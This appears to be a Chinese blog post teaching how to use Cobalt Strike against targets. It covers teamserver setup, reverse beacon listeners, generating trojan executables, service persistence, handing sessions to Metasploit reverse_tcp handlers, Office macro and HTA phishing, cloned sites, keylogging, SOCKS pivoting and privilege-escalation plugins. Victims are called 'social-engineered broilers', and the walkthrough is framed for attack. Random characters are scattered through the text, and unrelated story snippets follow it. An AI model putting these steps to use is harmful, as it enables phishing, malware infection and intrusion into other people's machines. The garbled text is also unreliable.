cs工具使用

CobaltStrike是一款美國RedTeam開發(fā)的滲透測試神器相味,常被業(yè)界人稱為CS盯漂。最近這個工具大火,成為了滲透測試中不可缺少的利器锌云。其擁有多種協(xié)議主機上線方式,集成了提權(quán)吁脱,憑據(jù)導(dǎo)出桑涎,端口轉(zhuǎn)發(fā),socket代理兼贡,office攻擊石洗,文件捆綁,釣魚等功能紧显。同時讲衫,CobaltStrike還可以調(diào)用Mimikatz等其他知名工具,因此廣受黑客喜愛孵班。

CobaltStrike分為客戶端和服務(wù)端可分布式操作可以協(xié)同作戰(zhàn)涉兽。但一定要架設(shè)在外網(wǎng)上。當然你知道利用這款工具主要用于內(nèi)網(wǎng)滲透以及APT攻擊篙程。

項目官網(wǎng):https://www.cobaltstrike.com

實驗環(huán)境:

服務(wù)器端(Linux):192.168.0.109靶機(windows):192.168.19.130

使用cobaltstrike 3.14

實驗步驟

將工具上傳到kali系統(tǒng)中運行時給777權(quán)限

root@kali:/mnt/cobaltstrike# chmod 777

/mnt/cobaltstrike/

一枷畏、啟動,連接服務(wù)器

啟動服務(wù)端:(test 為待會靶機連接服務(wù)器的密碼)./teamserver 192.168.19.146 test

Test為密碼hash密碼要與客戶端一樣諾不一樣則此軟件存在后面

客戶端連接服務(wù)器運行:cobalstrike.bat

啟動客戶端虱饿,輸入ip拥诡,密碼触趴,端口,用戶默認

如果客戶端 是Linux操作系統(tǒng)則運行以下命令渴肉,啟動客戶端:java -Dfile.encoding=UTF-8

-javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap

-XX:+UseParallelGC -jar cobaltstrike.jar

創(chuàng)建監(jiān)聽器冗懦。4.0一、創(chuàng)建監(jiān)聽器

1仇祭、點擊 Cobalt Strike ->

Listeners->Add披蕉,其中內(nèi)置了八個Payload,

wndows/beacon_dns/reverse_dns_txt

windows/beacon_http/reverse_http

windows/beacon_https/reverse_https

windows/beacon_bind_pipe

windows/beacon_tcp

windows/beacon_extc2

windows/foreign/reverse_http

windows/foreign/reverse_https

生成木馬創(chuàng)建payload 讓主機上線

運行該exe主機成功上線:可以查看上線主機的磁盤信息乌奇,進行端口掃描没讲,查看進程等信息。

同理如果將生成的artifact.exe作為附件發(fā)送給其他人礁苗,只要有人點擊爬凑,則他的機器會上線。不過現(xiàn)在的電腦都裝了殺毒軟件试伙,所以payload需做免殺贰谣。這個后續(xù)在研發(fā)

HttpsPayload應(yīng)用

優(yōu)點:可能過行為查殺、另外administrator運行可直接提升為system權(quán)限

第一步

Windows Service需要向操作系統(tǒng)注冊EXE直接運行??

第二步:創(chuàng)建服務(wù)

Sc create test binpath= ”c:\test.exe”? ? ? //創(chuàng)建的服務(wù)名迁霎,binPath后面是運行exe文件的所在路徑? ? 創(chuàng)建一個路徑一般放在C:\Windows\System32下因為這個路徑執(zhí)行文件最多

start= auto displayname= ”test”? ? ? ? ? //將exe注冊為windows服務(wù)?displayname服務(wù)器名稱

Sc start test? ? ? ? ? ? ? ? ? ? //開啟這個服務(wù)

Sc delete test? ? ? ? ? ? ? ? ? ?//刪除這個服務(wù)

Sc top test? ? ? ? ? ? ? ? ? ? ? ?//首先使用這個服務(wù)?

sc配置服務(wù)

有以下集中方式:

sc config 服務(wù)名 start= AUTO????(自動)

sc config 服務(wù)名 start= DEMAND??(手動)

sc config 服務(wù)名 start= DISABLED(禁用)


三吱抚、關(guān)于SC

可參考一個網(wǎng)友的博文---SC命令管理服務(wù)狀態(tài):http://blog.csdn.net/ddjj_1980/article/details/7493045



1、結(jié)合metasploit,反彈shell

1. MSF中use?exploit/multi/handler考廉,然后set payload?windows/meterpreter/reverse_tcp秘豹、set lhost、set lport昌粤;然后CS中新建監(jiān)聽器既绕;一個test社工肉雞運行,然后新建監(jiān)聽器reverse_tcp派生會話涮坐,run:


新建兩個監(jiān)聽器一個放木馬上線

在靶機中使用Cobalt Strike創(chuàng)建一個windows/foreign/reverse_tcp的Listener凄贩。其中ip為Metasploit的ip地址,端口為Metasploit所監(jiān)聽的端口袱讹。

選中剛剛新建msf





session -i查看會話然后session -i 1進入

派生給reverse_tcp然后Exploit

2疲扎、office宏釣魚

攻擊→后門→MS office 然后復(fù)制惡意代碼→插入office的宏中,社工肉雞打開即可

?MSF中use?exploit/multi/handler捷雕,然后set payload?windows/meterpreter/reverse_tcp椒丧、set lhost、set lport救巷;然后CS中新建監(jiān)聽器壶熏;一個test社工肉雞運行,然后新建監(jiān)聽器reverse_tcp派生會話浦译,run:或使用另一個監(jiān)聽器可以直接在圖形化界面使用

或使用另一個監(jiān)聽器可以直接在圖形化界面使用

下載運行則中招

Cs 生成的代碼直接放到創(chuàng)建里面去棒假,注意:做試驗的時候溯职,宏的位置不要設(shè)置所有的活動模板和文檔,建設(shè)應(yīng)用在當前文檔帽哑,不然本機所有word文檔運行都會種上你的木馬谜酒,另外打開word文檔有宏提示,一般是word默認禁用所有宏(文件—選項—信任中心—信任中心設(shè)置里面配置)祝拯。

3甚带、hta網(wǎng)頁掛馬

第一步:生成hta



第二步:使用文件下載




點擊開始之后她肯,evil.hta文件會自動傳到cs uploads目錄佳头。




如果之前設(shè)置過釣魚頁面,記得一定要刪掉晴氨,不然會克隆的時候會報錯


總結(jié):

1. 先制作HTML:http://192.168.1.184:80/test.hta

2. 釣魚攻擊→文件下載:http://192.168.1.184:80/download/file.ext

3. 釣魚攻擊→克隆網(wǎng)站:http://192.168.1.184:80/

4. 社工肉雞打開:

鍵盤記錄

4康嘉、郵件釣魚

1. 郵件釣魚:

附件下載后運行

5. 信息收集

制作好釣魚頁面:可以使用https://bitly.com制作短網(wǎng)址,然后讓對方打開:

然后設(shè)置好跳轉(zhuǎn)的網(wǎng)址

以通過https://bitly.com生成url短鏈接 ()? ?

6. socks代理:

win7雙網(wǎng)卡:內(nèi)網(wǎng):172.16.2.1????

win2003:172.16.2.2

win7雙網(wǎng)卡

2003內(nèi)網(wǎng):172.16.2.1

MSF中:setg Proxies socks4:192.168.1.184:40520籽前;use auxiliary/scanner/smb/smb_version亭珍;然后set rhosts 172.16.2.2;run

setg Proxiessocks4:192.168.0.106:6677

也可以使用下面方法:

開啟socks4a代理枝哄,通過代理進行內(nèi)網(wǎng)滲透

開啟socks肄梨,可以通過命令,也可以通過右鍵Pivoting->SOCKS Server


beacon> socks2222

[+] startedSOCKS4a server on: 2222

[+] host calledhome, sent: 16 bytes

然后vim

/etc/proxychains.conf 挠锥,在文件末尾添加socks4代理服務(wù)器

使用proxychains代理掃描內(nèi)網(wǎng)主機??proxychains nmap -sP192.168.183.0/24


小結(jié):

1. CS可以創(chuàng)建多個客戶端众羡,操作方便

2. 功能擴展比較多,如:payload可以多種語言蓖租。

3. 支持宏的辦公軟件都可以(office/WPS)

4. 默認宏安全性高/非常安全粱侣,運行宏時會提示;中低不會提示蓖宦,打開world有提示齐婴,說明宏很有可能有木馬。


cs提權(quán)

你以什么權(quán)限運行的木馬稠茂,那么木馬將擁有此權(quán)限柠偶,如果權(quán)限過低我們只能進行提權(quán)。

提權(quán)插件下載https://github.com/rsmudge/Elevatekit

http://k8gege.org/Download/

https://github.com/k8gege/Aggressor


選擇腳本管理器將下載好的插件放入進去不要有中午目錄



內(nèi)網(wǎng)滲透插件加使用方法

https://github.com/k8gege/Aggressor

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末睬关,一起剝皮案震驚了整個濱河市嚣州,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌共螺,老刑警劉巖该肴,帶你破解...
    沈念sama閱讀 216,372評論 6 498
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異藐不,居然都是意外死亡匀哄,警方通過查閱死者的電腦和手機秦效,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,368評論 3 392
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來涎嚼,“玉大人阱州,你說我怎么就攤上這事》ㄌ荩” “怎么了苔货?”我有些...
    開封第一講書人閱讀 162,415評論 0 353
  • 文/不壞的土叔 我叫張陵,是天一觀的道長立哑。 經(jīng)常有香客問我夜惭,道長,這世上最難降的妖魔是什么铛绰? 我笑而不...
    開封第一講書人閱讀 58,157評論 1 292
  • 正文 為了忘掉前任诈茧,我火速辦了婚禮,結(jié)果婚禮上捂掰,老公的妹妹穿的比我還像新娘敢会。我一直安慰自己,他們只是感情好这嚣,可當我...
    茶點故事閱讀 67,171評論 6 388
  • 文/花漫 我一把揭開白布鸥昏。 她就那樣靜靜地躺著,像睡著了一般姐帚。 火紅的嫁衣襯著肌膚如雪吏垮。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,125評論 1 297
  • 那天卧土,我揣著相機與錄音惫皱,去河邊找鬼甥温。 笑死渗稍,一個胖子當著我的面吹牛够委,可吹牛的內(nèi)容都是我干的讼呢。 我是一名探鬼主播校翔,決...
    沈念sama閱讀 40,028評論 3 417
  • 文/蒼蘭香墨 我猛地睜開眼陕见,長吁一口氣:“原來是場噩夢啊……” “哼品山!你這毒婦竟也來了肝陪?” 一聲冷哼從身側(cè)響起友酱,我...
    開封第一講書人閱讀 38,887評論 0 274
  • 序言:老撾萬榮一對情侶失蹤晴音,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后缔杉,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體锤躁,經(jīng)...
    沈念sama閱讀 45,310評論 1 310
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,533評論 2 332
  • 正文 我和宋清朗相戀三年或详,在試婚紗的時候發(fā)現(xiàn)自己被綠了系羞。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片郭计。...
    茶點故事閱讀 39,690評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖椒振,靈堂內(nèi)的尸體忽然破棺而出昭伸,到底是詐尸還是另有隱情,我是刑警寧澤澎迎,帶...
    沈念sama閱讀 35,411評論 5 343
  • 正文 年R本政府宣布庐杨,位于F島的核電站,受9級特大地震影響夹供,放射性物質(zhì)發(fā)生泄漏灵份。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,004評論 3 325
  • 文/蒙蒙 一罩引、第九天 我趴在偏房一處隱蔽的房頂上張望各吨。 院中可真熱鬧枝笨,春花似錦袁铐、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,659評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至徙融,卻和暖如春洒缀,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背欺冀。 一陣腳步聲響...
    開封第一講書人閱讀 32,812評論 1 268
  • 我被黑心中介騙來泰國打工树绩, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人隐轩。 一個月前我還...
    沈念sama閱讀 47,693評論 2 368
  • 正文 我出身青樓饺饭,卻偏偏與公主長得像,于是被迫代替她去往敵國和親职车。 傳聞我的和親對象是個殘疾皇子瘫俊,可洞房花燭夜當晚...
    茶點故事閱讀 44,577評論 2 353

推薦閱讀更多精彩內(nèi)容

  • 完成偽造郵件發(fā)送試驗 要想查看一個域名是否配置了SPF,可以用nslookup或者dig查看: nslookup ...
    卿酌南燭_b805閱讀 2,197評論 0 1
  • 一 漏洞及漏洞發(fā)掘方法 漏洞悴灵,是指在硬件扛芽、軟件、協(xié)議實現(xiàn)或系統(tǒng)安全策略上存在缺陷积瞒,攻擊者能夠在未授權(quán)的情況下對系統(tǒng)...
    kaitoulee閱讀 15,207評論 0 30
  • sqlmap用戶手冊 說明:本文為轉(zhuǎn)載川尖,對原文中一些明顯的拼寫錯誤進行修正,并標注對自己有用的信息茫孔。 ======...
    wind_飄閱讀 2,044評論 0 5
  • 今天是12月26號星期四叮喳。今天下午放學(xué)媽媽來接我庐船。我一回到家,媽媽就摸我的頭嘲更。說還有點燒筐钟。又給我量了體溫。量了38...
    5cb52a250f18閱讀 125評論 0 0
  • 《不懂帶人,你就自己干到死》這本書第12~31頁一直在說明一個重要的內(nèi)容宠哄,“如何抓住談話的要點”壹将,一共分為6個部分...
    古月大俠_拆書贏未來閱讀 306評論 0 3